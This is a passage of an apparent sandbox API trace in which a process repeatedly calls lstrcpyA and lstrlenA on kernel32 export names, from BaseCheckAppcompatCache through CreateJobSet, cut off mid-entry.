[0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.299] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.299] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.299] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.299] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.299] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.299] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.299] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.299] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.299] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.299] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.299] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.300] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.300] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.300] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.300] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.300] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.300] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.300] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.300] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.300] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.300] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.300] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.300] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.300] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.300] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.300] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.300] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.300] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.300] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.300] lstrlenA (lpString="BEEP") returned 4 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.301] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.301] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.301] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.301] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.301] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.301] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.301] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.301] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.301] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.301] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.301] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.301] lstrlenA (lpString="CANCELIO") returned 8 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.301] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.301] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.301] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.301] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.301] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.301] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.301] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.302] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.302] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.302] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.302] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.302] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.302] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.302] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.302] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.302] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.302] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.302] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.302] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.302] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.302] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.302] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.302] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.302] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.302] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.302] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.303] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.303] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.303] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.303] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.303] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.303] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.303] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.303] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.303] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.303] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.303] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.303] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.303] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.303] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.303] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.303] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.303] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.303] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.303] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.303] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.304] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.304] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.304] lstrlenA (lpString="COPYFILEA") returned 9 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.304] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.304] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.304] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.304] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.304] lstrlenA (lpString="COPYFILEW") returned 9 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.304] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.304] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.304] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.304] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.304] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.304] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.304] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.304] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.304] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.304] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.304] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.304] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.305] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.305] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.305] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.305] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.305] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.305] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.305] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.305] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.305] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.305] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.305] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.305] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.305] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.305] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.305] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.305] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.305] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.305] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.305] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.306] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.306] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.306] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.306] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.306] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: 